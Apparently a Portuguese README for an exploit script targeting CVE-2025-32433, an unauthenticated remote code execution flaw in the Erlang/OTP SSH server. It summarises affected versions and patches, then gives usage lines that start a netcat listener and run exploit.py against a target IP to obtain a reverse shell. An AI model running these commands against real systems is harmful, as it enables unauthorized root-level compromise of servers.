
CVE-2025-32433 Summary and Attack Overview
Resumo e visão geral do ataque da CVE-2025-32433
A CVE-2025-32433 é uma vulnerabilidade crítica de execução remota de código (RCE) não autenticada no servidor SSH do Erlang/OTP, divulgada em 16 de abril de 2025. O Erlang/OTP SSH é uma biblioteca usada em várias aplicações distribuídas e de telecomunicações. A falha surge do tratamento inadequado das mensagens do protocolo SSH: o servidor não impõe a sequência normal de autenticação, permitindo que um invasor envie mensagens SSH especialmente criadas antes da autenticação. Ao fazer isso, o invasor pode injetar e executar código Erlang arbitrário no servidor nvd.nist.gov offsec.com . Em termos práticos, isso significa que um invasor com acesso à rede a um servidor SSH Erlang/OTP vulnerável (muitas vezes executando como root) pode desencadear um shell reverso ou executar comandos sem qualquer credencial, levando ao comprometimento total do sistema nvd.nist.gov offsec.com . Esta vulnerabilidade recebeu CVSS 10.0 (gravidade máxima) offsec.com .
As versões afetadas são todas as versões do Erlang/OTP abaixo de OTP-27.3.3, OTP-26.2.5.11 ou OTP-25.3.2.20 (as versões corrigidas) nvd.nist.gov offsec.com . Os sistemas afetados frequentemente incluem servidores Linux ou appliances executando um daemon SSH baseado em Erlang (não confundir com OpenSSH). É importante notar que servidores OpenSSH padrão em Linux/BSD não são vulneráveis offsec.com . Os usuários devem assumir que qualquer servidor SSH Erlang/OTP exposto está afetado e aplicar os patches oficiais ou desabilitar o serviço SSH imediatamente.
O ataque funciona iniciando uma conexão SSH e então enviando uma sequência de mensagens SSH fora de ordem. :
uso:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
ex:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555